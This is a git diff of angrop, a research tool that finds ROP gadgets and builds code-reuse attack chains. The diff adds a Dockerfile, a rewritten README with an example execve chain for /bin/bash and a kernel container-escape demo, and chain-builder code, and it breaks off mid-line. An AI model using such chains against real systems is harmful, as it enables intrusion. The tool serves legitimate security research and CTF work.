diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 00000000..c2c37a53 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,27 @@ +from python:3.13-bookworm + +run apt-get update && apt-get upgrade -y +run pip install --upgrade pip + +run apt-get install -y make binutils-riscv64-linux-gnu git + +# setup python dependencies +run pip install cffi pwntools unicorn==2.0.1.post1 protobuf==5.28.2 +run pip install setuptools==79.0.1 + +run git clone --depth 1 -b wip/riscv https://github.com/angr/archinfo /archinfo +workdir /archinfo +run pip install -e . +run pip install pyvex==9.2.139 cle==9.2.139 claripy==9.2.139 +run git clone --depth 1 -b wip/riscv https://github.com/angr/angr /angr +workdir /angr +run sed -i 's/9.2.153.dev0/9.2.139/' angr/__init__.py +run sed -i 's/9.2.153.dev0/9.2.139/' ./pyproject.toml +run pip install --no-build-isolation -e . + +# install angrop +copy . /angrop +workdir /angrop +run pip install -e . +run pip install ailment==9.2.153 +copy bin/angrop-cli /usr/bin/angrop-cli diff --git a/README.md b/README.md index 4f8135f9..053df8d0 100644 --- a/README.md +++ b/README.md @@ -6,144 +6,103 @@ angrop is a rop gadget finder and chain builder ## Overview angrop is a tool to automatically generate rop chains. -It is built on top of angr's symbolic execution engine, and uses constraint solving for generating chains and understanding the effects of gadgets. +It is built on top of angr's symbolic execution engine. +It uses symbolic execution to understand the effects of gadgets and uses constraint solving and graph search for generating chains. +Its design is architecture-agnostic so it supports multiple architectures. -angrop should support all the architectures supported by angr, although more testing needs to be done. +Typically, it generate rop chains faster than humans. +In some cases, it can generate hard rop chains that may take humans hours to build within a few seconds. +Some examples can be found [here](examples). -Typically, it can generate rop chains (especially long chains) faster than humans. +It comes with a cli and a python api. +The command line `angrop-cli` offers some basic gadget finding/chaining capability such as finding an `system`/`execve` chain or invoking a specific function. +The `angrop` python api offers the full features. +Details can be found in [Usage](README.md#usage). -It includes functions to generate chains which are commonly used in exploitation and CTF's, such as setting registers, and calling functions. +`angrop` does not just only works for userspace binaries, it works for the Linux kernel as well. ## Architectures Supported architectures: * x86/x64 -* ARM * MIPS -* AARCH64 +* ARM +* AArch64 +* RISC-V (64bit) It should be relatively easy to support other architectures that are supported by `angr`. If you'd like to use `angrop` on other architectures, please create an issue and we will look into it :) ## Usage -The ROP analysis finds rop gadgets and can automatically build rop chains. +You can use either the CLI or the Python API. +The CLI only offers some basic functionalities while the Python API provides much more capabilities and is much more powerful. + +## CLI +angrop comes with a command line tool for easy day-to-day usage +```bash +# dump command will find gadgets in the target binary, true/false marks whether the gadget is self-contained +$ angrop-cli dump /bin/ls +0x11735: true : adc bl, byte ptr [rbx + 0x4c]; mov eax, esp; pop r12; pop r13; pop r14; pop rbp; ret +0x10eaa: true : adc eax, 0x12469; add rsp, 0x38; pop rbx; pop r12; pop r13; pop r14; pop r15; pop rbp; ret +00xe026: true : adc eax, 0xcec8; pop rbx; cmove rax, rdx; pop r12; pop rbp; ret +00xdfd4: true : adc eax, 0xcf18; pop rbx; cmove rax, rdx; pop r12; pop rbp; ret +00xdfa5: true : adc eax, 0xcf4d; pop rbx; cmove rax, rdx; pop r12; pop rbp; ret +...... + +# chain command will find some predefined chains in the binary +$ angrop-cli chain -t execve /bin/bash +code_base = 0x0 +chain = b"" +chain += p64(code_base + 0x36083) # pop rax; pop rbx; pop rbp; ret +chain += p64(code_base + 0x30016) # add rsp, 8; ret +chain += p64(code_base + 0x34873) +chain += p64(code_base + 0x0) +chain += p64(code_base + 0x9616d) # mov edx, ebp; mov rsi, r12; mov rdi, rbx; call rax +chain += p64(code_base + 0xe501e) # pop rsi; ret 0 +chain += p64(code_base + 0x0) +chain += p64(code_base + 0x31470) # execve@plt +chain += p64(0x0) +chain += p64(code_base + 0x10d5bf) +``` +## Python API ```python >>> import angr, angrop >>> p = angr.Project("/bin/ls") >>> rop = p.analyses.ROP() >>> rop.find_gadgets() ->>> chain = rop.set_regs(rax=0x1337, rbx=0x56565656) ->>> chain.payload_str() -b'\xb32@\x00\x00\x00\x00\x007\x13\x00\x00\x00\x00\x00\x00\xa1\x18@\x00\x00\x00\x00\x00VVVV\x00\x00\x00\x00' +>>> chain = rop.set_regs(rax=0x41414141, rbx=0x42424242) >>> chain.print_payload_code() +code_base = 0x0 chain = b"" -chain += p64(0x410b23) # pop rax; ret -chain += p64(0x1337) -chain += p64(0x404dc0) # pop rbx; ret -chain += p64(0x56565656) +chain += p64(code_base + 0xf5e2) # pop rbx; pop r12; test eax, eax; pop rbp; cmovs eax, edx; ret +chain += p64(0x42424242) +chain += p64(0x0) +chain += p64(0x0) +chain += p64(code_base + 0x812f) # pop rsi; pop rbp; ret +chain += p64(0x41414141) +chain += p64(0x0) +chain += p64(code_base + 0x169dd) # mov rax, rsi; ret +chain += p64(code_base + 0x10a55) ``` +More detailed docs on the Python API can be found [here](docs/pythonapi.md). -## Chains -```python -# angrop includes methods to create certain common chains - -# setting registers -chain = rop.set_regs(rax=0x1337, rbx=0x56565656) - -# moving registers -chain = rop.move_regs(rax='rdx') - -# writing to memory -# writes "/bin/sh\0" to address 0x61b100 -chain = rop.write_to_mem(0x61b100, b"/bin/sh\0") +## Demo -# calling functions -chain = rop.func_call("read", [0, 0x804f000, 0x100]) - -# adding values to memory -chain = rop.add_to_mem(0x804f124, 0x41414141) - -# shifting stack pointer like add rsp, 0x8; ret (this gadget shifts rsp by 0x10) -chain = rop.shift(0x10) - -# generating ret-sled chains like ret*0x10, but works for ARM/MIPS as well -chain = rop.retsled(0x40) - -# bad bytes can be specified to generate chains with no bad bytes -rop.set_badbytes([0x0, 0x0a]) -chain = rop.set_regs(eax=0) - -# chains can be added together to chain operations -chain = rop.write_to_mem(0x61b100, b"/home/ctf/flag\x00") + rop.func_call("open", [0x61b100,os.O_RDONLY]) + ... - -# chains can be printed for copy pasting into exploits ->>> chain.print_payload_code() -chain = b"" -chain += p64(0x410b23) # pop rax; ret -chain += p64(0x74632f656d6f682f) -chain += p64(0x404dc0) # pop rbx; ret -chain += p64(0x61b0f8) -chain += p64(0x40ab63) # mov qword ptr [rbx + 8], rax; add rsp, 0x10; pop rbx; ret -... - -``` - -## Gadgets - -Gadgets contain a lot of information: - -For example look at how the following code translates into a gadget - -```asm - 0x403be4: and ebp,edi - 0x403be6: mov QWORD PTR [rbx+0x90],rax - 0x403bed: xor eax,eax - 0x403bef: add rsp,0x10 - 0x403bf3: pop rbx - 0x403bf4: ret -``` - -```python ->>> print(rop.rop_gadgets[0]) -Gadget 0x403be4 -Stack change: 0x20 -Changed registers: set(['rbx', 'rax', 'rbp']) -Popped registers: set(['rbx']) -Register dependencies: - rbp: [rdi, rbp] -Memory write: - address (64 bits) depends on: ['rbx'] - data (64 bits) depends on: ['rax'] -``` - - -The dependencies describe what registers affect the final value of another register. -In the example above, the final value of rbp depends on both rdi and rbp. -Dependencies are analyzed for registers and for memory actions. -All of the information is stored as properties in the gadgets, so it is easy to iterate over them and find gadgets which fit your needs. - -```python ->>> for g in rop.rop_gadgets: - if "rax" in g.popped_regs and "rbx" not in g.changed_regs: - print(g) -Gadget 0x4032b3 -Stack change: 0x10 -Changed registers: set(['rax']) -Popped registers: set(['rax']) -Register dependencies: -``` +### gadget finding +![gadget](gifs/find_gadget.gif?raw=true) -## TODO's -Allow strings to be passed as arguments to func_call(), which are then written to memory and referenced. +### find execve chain +![execve](gifs/execve.gif?raw=true) -Add a function for open, read, write (for ctf's) +### container escape chain for the kernel +![kernel](gifs/kernel.gif?raw=true) -The segment analysis for finding executable addresses seems to break on non-elf binaries often, such as PE files, kernel modules. +## Paper +We describe our design and findings in this paper -Allow setting constraints on the generated chain e.g. bytes that are valid. +[__ropbot: Reimaging Code Reuse Attack Synthesis__](https://kylebot.net/papers/ropbot.pdf) -## Common gotchas -Make sure to import angrop before calling proj.analyses.ROP() +Kyle Zeng, Moritz Schloegel, Christopher Salls, Adam Doupé, Ruoyu Wang, Yan Shoshitaishvili, Tiffany Bao -Make sure to call find_gadets() before trying to make chains +*In Proceedings of the Network and Distributed System Security Symposium (NDSS), February 2026*, diff --git a/angrop/arch.py b/angrop/arch.py index be5d022c..1ae117a9 100644 --- a/angrop/arch.py +++ b/angrop/arch.py @@ -6,9 +6,10 @@ class ROPArch: def __init__(self, project, kernel_mode=False): self.project = project self.kernel_mode = kernel_mode - self.max_sym_mem_access = 4 + self.max_sym_mem_access = 1 self.alignment = project.arch.instruction_alignment - self.reg_set = self._get_reg_set() + self.reg_list = self._get_reg_list() + self.reg_set = set(self.reg_list) # backward compatibility, will be removed self.max_block_size = None self.fast_mode_max_block_size = None @@ -19,20 +20,24 @@ def __init__(self, project, kernel_mode=False): self.ret_insts = None self.execve_num = None - def _get_reg_set(self): + def _get_reg_list(self): """ - get the set of names of general-purpose registers + get the set of names of general-purpose registers + bp + because bp is usually considered as general-purpose these days """ arch = self.project.arch - _sp_reg = arch.register_names[arch.sp_offset] - _ip_reg = arch.register_names[arch.ip_offset] + sp_reg = arch.register_names[arch.sp_offset] + ip_reg = arch.register_names[arch.ip_offset] + bp_reg = arch.register_names[arch.bp_offset] # get list of general-purpose registers default_regs = arch.default_symbolic_registers # prune the register list of the instruction pointer and the stack pointer - return {r for r in default_regs if r not in (_sp_reg, _ip_reg)} + reg_list = [r for r in default_regs if r not in (sp_reg, ip_reg, bp_reg)] + reg_list.append(bp_reg) + return reg_list - def block_make_sense(self, block): + def block_make_sense(self, block) -> bool: return True class X86(ROPArch): @@ -47,13 +52,25 @@ def __init__(self, project, kernel_mode=False): def _x86_block_make_sense(self, block): capstr = str(block.capstone).lower() + + for inst in block.capstone.insns: + if inst.mnemonic == 'ret' and inst.op_str: + n = int(inst.op_str, 16) + if n % self.project.arch.bytes != 0 or n >= 0x100: + return False + + if inst.mnemonic == 'int' and inst.op_str: + n = int(inst.op_str, 16) + if n != 0x80: + return False + # currently, angrop does not handle "repz ret" correctly, we filter it - if any(x in capstr for x in ('cli', 'rex', 'repz ret')): + if any(x in capstr for x in ('cli', 'rex', 'repz ret', 'retf', 'hlt', 'wait', 'loop', 'lock')): return False if not self.kernel_mode: if "fs:" in capstr or "gs:" in capstr or "iret" in capstr: return False - if block.size < 1 or block.bytes[0] == 0x4f: + if block.size < 1: return False return True @@ -115,6 +132,13 @@ def __init__(self, project, kernel_mode=False): self.fast_mode_max_block_size = self.alignment * 6 self.execve_num = 0xdd + def block_make_sense(self, block): + for x in block.capstone.insns: + # won't be able to ROP with PAC + if x.mnemonic == 'autiasp': + return False + return True + class MIPS(ROPArch): def __init__(self, project, kernel_mode=False): super().__init__(project, kernel_mode=kernel_mode) @@ -122,6 +146,15 @@ def __init__(self, project, kernel_mode=False): self.max_block_size = self.alignment * 8 self.fast_mode_max_block_size = self.alignment * 6 self.execve_num = 0xfab + self.syscall_insts = {b"\x0c\x00\x00\x00"} # syscall + +class RISCV64(ROPArch): + def __init__(self, project, kernel_mode=False): + super().__init__(project, kernel_mode=kernel_mode) + self.ret_insts = {b"\x82\x80"} + self.max_block_size = self.alignment * 10 + self.fast_mode_max_block_size = self.alignment * 6 + self.execve_num = 0xdd def get_arch(project, kernel_mode=False): name = project.arch.name @@ -134,6 +167,8 @@ def get_arch(project, kernel_mode=False): return ARM(project, kernel_mode=mode) elif name == 'AARCH64': return AARCH64(project, kernel_mode=mode) + elif name == 'RISCV64': + return RISCV64(project, kernel_mode=mode) elif name.startswith('MIPS'): return MIPS(project, kernel_mode=mode) else: diff --git a/angrop/chain_builder/__init__.py b/angrop/chain_builder/__init__.py index dd1ebd17..a4b37dd8 100644 --- a/angrop/chain_builder/__init__.py +++ b/angrop/chain_builder/__init__.py @@ -9,6 +9,7 @@ from .pivot import Pivot from .shifter import Shifter from .. import rop_utils +from ..errors import RopException l = logging.getLogger("angrop.chain_builder") @@ -48,6 +49,7 @@ def __init__(self, project, rop_gadgets, pivot_gadgets, syscall_gadgets, arch, b l.warning("%s is not a fully supported OS, SysCaller may not work on this OS", self.project.loader.main_object.os) self._shifter = Shifter(self) + self._can_do_write = None def set_regs(self, *args, **kwargs): """ @@ -160,6 +162,7 @@ def set_roparg_filler(self, roparg_filler): self.roparg_filler = roparg_filler def bootstrap(self): + # get a functional chain builder self._reg_mover.bootstrap() self._reg_setter.bootstrap() self._mem_writer.bootstrap() @@ -170,7 +173,28 @@ def bootstrap(self): self._pivot.bootstrap() self._shifter.bootstrap() - self._reg_setter.optimize() - - # should also be able to do execve by providing writable memory - # todo pass values to setregs as symbolic variables + def check_can_do_write(self): + bits = self.project.arch.bits + if bits == 32: + ptr = 0x31313131 + else: + ptr = 0x313131313131 + try: + self.write_to_mem(ptr, b'A'*4) + self._can_do_write = True + except RopException: + self._can_do_write = False + + def optimize(self, processes=1): + # optimize reg_mover and reg_setter + again = True + cnt = 0 + while again and cnt < 5: + # check whether we can do memory write in the first place. + # If we can't, then there is no way to normalize jmp_mem gadgets + if not self._can_do_write: + self.check_can_do_write() + + again = self._reg_mover.optimize(processes=processes) + again |= self._reg_setter.optimize(processes=processes) + cnt += 1 diff --git a/angrop/chain_builder/builder.py b/angrop/chain_builder/builder.py index a8e55b55..2a761cbe 100644 --- a/angrop/chain_builder/builder.py +++ b/angrop/chain_builder/builder.py @@ -1,7 +1,13 @@ +import re +import math import struct +import logging +import itertools from abc import abstractmethod from functools import cmp_to_key +from collections import defaultdict +import angr import claripy from .. import rop_utils @@ -9,25 +15,26 @@ from ..rop_gadget import RopGadget from ..rop_value import RopValue from ..rop_chain import RopChain +from ..rop_block import RopBlock from ..gadget_finder.gadget_analyzer import GadgetAnalyzer +l = logging.getLogger(__name__) + class Builder: """ a generic class to bootstrap more complicated chain building functionality """ + used_writable_ptrs = [] + def __init__(self, chain_builder): self.chain_builder = chain_builder self.project = chain_builder.project self.arch = chain_builder.arch + # used for effect analysis self._gadget_analyzer = GadgetAnalyzer(self.project, True, kernel_mode=False, arch=self.arch) - self._sim_state = rop_utils.make_symbolic_state( - self.project, - self.arch.reg_set, - stack_gsize=80*3 - ) @property def badbytes(self): @@ -37,23 +44,19 @@ def badbytes(self): def roparg_filler(self): return self.chain_builder.roparg_filler - def make_sim_state(self, pc): + def make_sim_state(self, pc, stack_gsize): """ make a symbolic state with all general purpose register + base pointer symbolized and emulate a `pop pc` situation """ - arch_bytes = self.project.arch.bytes - arch_endness = self.project.arch.memory_endness - - state = rop_utils.make_symbolic_state(self.project, self.arch.reg_set) - rop_utils.make_reg_symbolic(state, self.arch.base_pointer) - + state = rop_utils.make_symbolic_state(self.project, self.arch.reg_list, stack_gsize) + state.stack_pop() state.regs.ip = pc - state.add_constraints(state.memory.load(state.regs.sp, arch_bytes, endness=arch_endness) == pc) - state.regs.sp += arch_bytes - state.solver._solver.timeout = 5000 return state + def set_regs(self, *args, **kwargs): + return self.chain_builder._reg_setter.run(*args, **kwargs) + @staticmethod def _sort_chains(chains): def cmp_func(chain1, chain2): @@ -90,33 +93,85 @@ def _word_contain_badbyte(self, ptr): def _get_ptr_to_writable(self, size): """ get a pointer to writable region that can fit `size` bytes + currently, we force it to point to a NULL region it shouldn't contain bad byte """ + null = b'\x00'*size + used_writable_ptrs = list(self.__class__.used_writable_ptrs) + + plt_sec = None # get all writable segments - segs = [ s for s in self.project.loader.main_object.segments if s.is_writable ] + if self.arch.kernel_mode: + segs = [x for x in self.project.loader.main_object.sections if x.name in ('.data', '.bss')] + else: + segs = [ s for s in self.project.loader.main_object.segments if s.is_writable ] + for sec in self.project.loader.main_object.sections: + if sec.name == '.got.plt': + plt_sec = sec + break + + def addr_is_used(addr): + for a, s in used_writable_ptrs: + if a <= addr < a+s or a < addr+size <= a+s: + return True + return False + # enumerate through all address to find a good address for seg in segs: - for addr in range(seg.min_addr, seg.max_addr): - if all(not self._word_contain_badbyte(x) for x in range(addr, addr+size, self.project.arch.bytes)): + # we should use project.loader.memory.find API, but it is currently broken as reported here: + # https://github.com/angr/angr/issues/5330 + max_addr = math.ceil(seg.max_addr / 0x1000)*0x1000 # // round up to page size + contains_plt = False + # my lazy implementation of avoiding taking addresses from the GOT table + # because they may not be zero during runtime even though they appear to be so in the binary + if plt_sec: + contains_plt = seg.min_addr <= plt_sec.min_addr and seg.max_addr >= plt_sec.max_addr + for addr in range(seg.min_addr, max_addr): + if plt_sec and contains_plt and plt_sec.contains_addr(addr): + continue + if any(self._word_contain_badbyte(x) for x in range(addr, addr+size, self.project.arch.bytes)): + continue + + data_len = size + if addr >= seg.max_addr and not addr_is_used(addr): + self.__class__.used_writable_ptrs.append((addr, size)) + return addr + if addr+size > seg.max_addr: + data_len = addr+size - seg.max_addr + try: + data = self.project.loader.memory.load(addr, data_len) + except KeyError: + continue + if data == null[:data_len] and not addr_is_used(addr): + self.__class__.used_writable_ptrs.append((addr, size)) return addr - return None + + l.error("used up all possible writable ptrs") + raise RopException("used up all possible writable ptrs") def _get_ptr_to_null(self): # get all non-writable segments segs = [ s for s in self.project.loader.main_object.segments if not s.is_writable ] # enumerate through all address to find a good address + null = b'\x00'*self.project.arch.bytes for seg in segs: - null = b'\x00'*self.project.arch.bytes for addr in self.project.loader.memory.find(null, search_min=seg.min_addr, search_max=seg.max_addr): if not self._word_contain_badbyte(addr): return addr - return None + + l.error("used up all possible ptrs to null") + raise RopException("used up all possible ptrs to null") @staticmethod def _ast_contains_stack_data(ast): vs = ast.variables return len(vs) == 1 and list(vs)[0].startswith('symbolic_stack_') + @staticmethod + def _ast_contains_reg_data(ast): + vs = ast.variables + return len(vs) == 1 and list(vs)[0].startswith('sreg_') + def _build_ast_constraints(self, ast): var_map = {} @@ -150,20 +205,76 @@ def _build_ast_constraints(self, ast): rop_values = {x:RopValue(y[1], self.project) for x,y in var_map.items()} return rop_values, consts - def _rebalance_ast(self, lhs, rhs): + def _solve_ast_constraint(self, ast, value): + variables = set() + if ast.op == 'BVS': + variables.add(ast) + else: + for x in ast.children_asts(): + if x.op != 'BVS': + continue + variables.add(x) + solver = claripy.Solver() + solver.add(ast == value) + + variables = list(variables) + + res = solver.batch_eval(variables, 1) + assert res + res = res[0] + + reg_d = {} + stack_d = {} + for idx, v in enumerate(variables): + name = v.args[0] + if name.startswith("sreg_"): + reg = name.split('_')[1][:-1] + reg_d[reg] = res[idx] + elif name.startswith("symbolic_stack_"): + re_res = re.match(r"symbolic_stack_(\d+)_", name) + offset = int(re_res.group(1)) # type:ignore + val = res[idx] + if self.project.arch.memory_endness == "Iend_LE": + val = claripy.Reverse(claripy.BVV(val, self.project.arch.bits)) + val = val.concrete_value + stack_d[offset] = val + else: + raise NotImplementedError("plz raise an issue") + return reg_d, stack_d + + def _rebalance_ast(self, lhs, rhs, mode='stack'): """ we know that lhs (stack content with modification) == rhs (user ropvalue) since user ropvalue may be symbolic, we need to present the stack content using the user ropvalue and store it on stack so that users can eval on their own ropvalue and get the correct solves - TODO: currently, we only support add/sub + TODO: currently, we only support add/sub, Extract/ZeroExt """ - assert self._ast_contains_stack_data(lhs) + # in some cases, we can just solve it + if mode == 'stack' and lhs.symbolic and not rhs.symbolic and len(lhs.variables) == 1 and lhs.depth > 1: + target_ast = None + for ast in lhs.children_asts(): + if ast.op == 'BVS' and ast.args[0].startswith('symbolic_stack'): + target_ast = ast + break + assert target_ast is not None + + solver = claripy.Solver() + solver.add(lhs == rhs) + return target_ast, claripy.BVV(solver.eval(target_ast, 1)[0], target_ast.size()) + + if lhs.op == 'If': + raise RopException("cannot handle conditional value atm") + + check_func = Builder._ast_contains_stack_data if mode == 'stack' else Builder._ast_contains_reg_data + + if not check_func(lhs): + raise RopException(f"cannot rebalance the constraint {lhs} == {rhs}") while lhs.depth != 1: match lhs.op: case "__add__" | "__sub__": arg0 = lhs.args[0] arg1 = lhs.args[1] - flag = self._ast_contains_stack_data(arg0) + flag = check_func(arg0) op = lhs.op if flag: lhs = arg0 @@ -177,18 +288,78 @@ def _rebalance_ast(self, lhs, rhs): rhs += other else: rhs = other - rhs + case "__and__" | "__or__": + arg0 = lhs.args[0] + arg1 = lhs.args[1] + flag0 = check_func(arg0) + flag1 = check_func(arg1) + if flag0 and flag1: + raise RopException(f"cannot rebalance {lhs}") + op = lhs.op + if flag0: + lhs = arg0 + other = arg1 + else: + lhs = arg1 + other = arg0 + if op == "__and__": + rhs = rhs & other case "Reverse": lhs = lhs.args[0] rhs = claripy.Reverse(rhs) + case "ZeroExt": + rhs_leading: claripy.ast.bv.BV = claripy.Extract(rhs.length-1, # type: ignore + rhs.length-lhs.args[0], + rhs) + if not rhs_leading.symbolic and rhs_leading.concrete_value != 0: + raise RopException("rebalance unsat") + rhs = claripy.Extract(rhs.length-lhs.args[0]-1, 0, rhs) + lhs = lhs.args[1] + case "SignExt": + rhs_leading: claripy.ast.bv.BV = claripy.Extract(rhs.length-1, # type: ignore + rhs.length-lhs.args[0], + rhs) + if not rhs_leading.symbolic and \ + rhs_leading.concrete_value not in (0, (1<> bits + lhs = lhs.args[0] + case "__xor__": + if check_func(lhs.args[0]): + other = lhs.args[1] + lhs = lhs.args[0] + else: + other = lhs.args[0] + lhs = lhs.args[1] + rhs = rhs ^ other case _: raise ValueError(f"{lhs.op} cannot be rebalanced at the moment. plz create an issue!") - assert self._ast_contains_stack_data(lhs) + assert check_func(lhs) + assert lhs.length == rhs.length return lhs, rhs - @rop_utils.timeout(8) + @rop_utils.timeout(3) def _build_reg_setting_chain( - self, gadgets, modifiable_memory_range, register_dict, stack_change - ): + self, gadgets, register_dict, constrained_addrs=None): """ This function figures out the actual values needed in the chain for a particular set of gadgets and register values @@ -196,15 +367,16 @@ def _build_reg_setting_chain( then constraining the final registers to the values that were requested """ + total_sc = sum(max(g.stack_change, g.max_stack_offset + self.project.arch.bytes) for g in gadgets) + arch_bytes = self.project.arch.bytes + # emulate a 'pop pc' of the first gadget test_symbolic_state = rop_utils.make_symbolic_state( self.project, - self.arch.reg_set, - stack_gsize=stack_change // self.project.arch.bytes + 1, + self.arch.reg_list, + total_sc//arch_bytes+1, # compensate for the first gadget ) - rop_utils.make_reg_symbolic(test_symbolic_state, self.arch.base_pointer) test_symbolic_state.ip = test_symbolic_state.stack_pop() - test_symbolic_state.solver._solver.timeout = 5000 # Maps each stack variable to the RopValue or RopGadget that should be placed there. stack_var_to_value = {} @@ -213,18 +385,37 @@ def map_stack_var(ast, value): if len(ast.variables) != 1: raise RopException("Target value not controlled by a single variable") var = next(iter(ast.variables)) - if not var.startswith("symbolic_stack_"): + if not var.startswith("symbolic_stack_") and not var.startswith("next_pc_"): raise RopException("Target value not controlled by the stack") stack_var_to_value[var] = value - arch_bytes = self.project.arch.bytes - state = test_symbolic_state.copy() # Step through each gadget and constrain the ip. + stack_patchs = [] for gadget in gadgets: - map_stack_var(state.ip, gadget) - state.solver.add(state.ip == gadget.addr) + if isinstance(gadget, RopGadget): + map_stack_var(state.ip, gadget) + state.ip = gadget.addr + elif isinstance(gadget, RopBlock): + rb = gadget + map_stack_var(state.ip, rb) + state.ip = rb._values[0].concreted + st = rb._blank_state + for idx, val in enumerate(rb._values[1:]): + state.memory.store(state.regs.sp+idx*arch_bytes, val.data, endness=self.project.arch.memory_endness) + stack_patchs.append((state.regs.sp+idx*arch_bytes, val.data)) + state.solver.add(*st.solver.constraints) + # when we import constraints, it is possible some of the constraints are associated with initial + # register value now stitch them together, only the ones being used though + st_vars = st.solver._solver.variables + used_regs = {x.split('-')[0].split('_')[-1] for x in st_vars if x.startswith('sreg_')} + for reg in used_regs: + state.solver.add(state.registers.load(reg) == st.registers.load(reg)) + else: + raise ValueError("huh?") + + # step following the trace for addr in gadget.bbl_addrs[1:]: succ = state.step() succ_states = [ @@ -244,7 +435,7 @@ def map_stack_var(ast, value): ) state = succ.unconstrained_successors[0] - if len(state.solver.eval_upto(state.ip, 2)) < 2: + if len(state.solver.eval_to_ast(state.ip, 2)) < 2: raise RopException("The final pc is not unconstrained!") # Record the variable that controls the final ip. @@ -280,21 +471,37 @@ def map_stack_var(ast, value): # Constrain memory access addresses. for action in state.history.actions: if action.type == action.MEM and action.addr.symbolic: - if modifiable_memory_range is None: - raise RopException( - "Symbolic memory address without modifiable memory range" - ) - state.solver.add(action.addr.ast >= modifiable_memory_range[0]) - state.solver.add(action.addr.ast < modifiable_memory_range[1]) + if len(state.solver.eval_to_ast(action.addr, 2)) == 1: + continue + addr_vars = action.addr.ast.variables + if len(addr_vars) == 1 and set(addr_vars).pop().startswith("symbolic_stack"): + if constrained_addrs is not None: + ptr_bv = constrained_addrs[0] + constrained_addrs = constrained_addrs[1:] + else: + ptr_bv = claripy.BVV(self._get_ptr_to_writable(action.size.ast//8), action.addr.ast.size()) + ropvalue = rop_utils.cast_rop_value(ptr_bv, self.project) + lhs, rhs = self._rebalance_ast(action.addr.ast, ptr_bv) + if self.project.arch.memory_endness == 'Iend_LE': + rhs = claripy.Reverse(rhs) + if ropvalue.rebase: + ropvalue._value = rhs - ropvalue._code_base + else: + ropvalue._value = rhs + map_stack_var(lhs, ropvalue) # now import the constraints from the state that has reached the end of the ropchain test_symbolic_state.solver.add(*state.solver.constraints) + # now import the stack patchs + for addr, data in stack_patchs: + test_symbolic_state.memory.store(addr, data, endness=self.project.arch.memory_endness) + bytes_per_pop = arch_bytes # constrain the "filler" values if self.roparg_filler is not None: - for offset in range(0, stack_change, bytes_per_pop): + for offset in range(0, total_sc, bytes_per_pop): sym_word = test_symbolic_state.stack_read(offset, bytes_per_pop) # check if we can constrain val to be the roparg_filler if test_symbolic_state.solver.satisfiable([sym_word == self.roparg_filler]): @@ -308,9 +515,16 @@ def map_stack_var(ast, value): badbytes=self.badbytes) # iterate through the stack values that need to be in the chain - for offset in range(-bytes_per_pop, stack_change, bytes_per_pop): + if not chain._blank_state.satisfiable(): + raise RopException("the chain is not feasible!") + + for offset in range(-bytes_per_pop, total_sc, bytes_per_pop): sym_word = test_symbolic_state.stack_read(offset, bytes_per_pop) - assert len(sym_word.variables) == 1 + assert len(sym_word.variables) <= 1 + if not sym_word.variables: + chain.add_value(sym_word) + continue + sym_var = next(iter(sym_word.variables)) if sym_var in stack_var_to_value: val = stack_var_to_value[sym_var] @@ -320,12 +534,23 @@ def map_stack_var(ast, value): value = RopValue(val.addr, self.project) value.rebase_analysis(chain=chain) chain.add_value(value) + elif isinstance(val, RopBlock): + chain.add_value(val._values[0]) else: chain.add_value(val) else: chain.add_value(sym_word) - chain.set_gadgets(gadgets) + # expand mixins to plain gadgets + plain_gadgets = [] + for g in gadgets: + if isinstance(g, RopGadget): + plain_gadgets.append(g) + elif isinstance(g, RopBlock): + plain_gadgets += g._gadgets + else: + raise RuntimeError("???") + chain.set_gadgets(plain_gadgets) return chain @@ -336,50 +561,76 @@ def _get_fill_val(self): return claripy.BVS("filler", self.project.arch.bits) @abstractmethod - def _same_effect(self, g1, g2): - raise NotImplementedError("_same_effect is not implemented!") + def _effect_tuple(self, g): + raise NotImplementedError("_effect_tuple is not implemented!") @abstractmethod - def _better_than(self, g1, g2): - raise NotImplementedError("_better_than is not implemented!") - - def same_effect(self, g1, g2): - return self._same_effect(g1, g2) - - def better_than(self, g1, g2): - if not self.same_effect(g1, g2): - return False - return self._better_than(g1, g2) + def _comparison_tuple(self, g): + raise NotImplementedError("_comparison_tuple is not implemented!") def __filter_gadgets(self, gadgets): """ - remove any gadgets that are strictly worse than others - FIXME: make all gadget filtering logic like what we do in reg_setter, which is correct and way more faster + group gadgets by features and drop lesser groups """ - gadgets = set(gadgets) + # gadget grouping + d = defaultdict(list) + for g in gadgets: + key = self._comparison_tuple(g) + d[key].append(g) + if len(d) == 0: + return set() + if len(d) == 1: + return {gadgets.pop()} + + # only keep the best groups + keys = set(d.keys()) bests = set() - while gadgets: - g1 = gadgets.pop() - # check if nothing is better than g1 - for g2 in bests|gadgets: - if self._better_than(g2, g1): #pylint: disable=arguments-out-of-order + while keys: + k1 = keys.pop() + # check if nothing is better than k1 + for k2 in bests|keys: + # if k2 is better than k1 + if all(k2[i] <= k1[i] for i in range(len(key))): # type:ignore break else: - bests.add(g1) - return bests + bests.add(k1) + + # turn groups back to gadgets + gadgets = set() + for key, val in d.items(): + if key not in bests: + continue + gadgets = gadgets.union(val) + return gadgets def _filter_gadgets(self, gadgets): + """ + process gadgets based on their effects + exclude gadgets that do symbolic memory access + """ bests = set() - gadgets = set(gadgets) - while gadgets: - g0 = gadgets.pop() - equal_class = {g for g in gadgets if self._same_effect(g0, g)} - equal_class.add(g0) + equal_classes = defaultdict(set) + for g in gadgets: + equal_classes[self._effect_tuple(g)].add(g) + for _, equal_class in equal_classes.items(): bests = bests.union(self.__filter_gadgets(equal_class)) - - gadgets -= equal_class return bests + @staticmethod + def _mixins_to_gadgets(mixins): + """ + simply expand all ropblocks to gadgets + """ + gadgets = [] + for mixin in mixins: + if isinstance(mixin, RopGadget): + gadgets.append(mixin) + elif isinstance(mixin, RopBlock): + gadgets += mixin._gadgets + else: + raise ValueError(f"cannot turn {mixin} into RopBlock!") + return gadgets + @abstractmethod def bootstrap(self): """ @@ -388,9 +639,306 @@ def bootstrap(self): raise NotImplementedError("each Builder class should have an `update` method!") @abstractmethod - def optimize(self): + def optimize(self, processes): """ improve the capability of this builder using other builders """ cls_name = self.__class__.__name__ raise NotImplementedError(f"`advanced_update` is not implemented for {cls_name}!") + + def _normalize_conditional(self, gadget, preserve_regs=None): + if preserve_regs is None: + preserve_regs = set() + + registers = {} + for reg in gadget.branch_dependencies: + var = claripy.BVS(f"bvar_{reg}", self.project.arch.bits) + registers[reg] = var + try: + chain = self.set_regs(preserve_regs=preserve_regs, **registers) + except RopException: + return None + gadgets = chain._gadgets + return gadgets + + def _normalize_jmp_reg(self, gadget, pre_preserve=None, to_set_regs=None): + if pre_preserve is None: + pre_preserve = set() + if to_set_regs is None: + to_set_regs = set() + reg_setter = 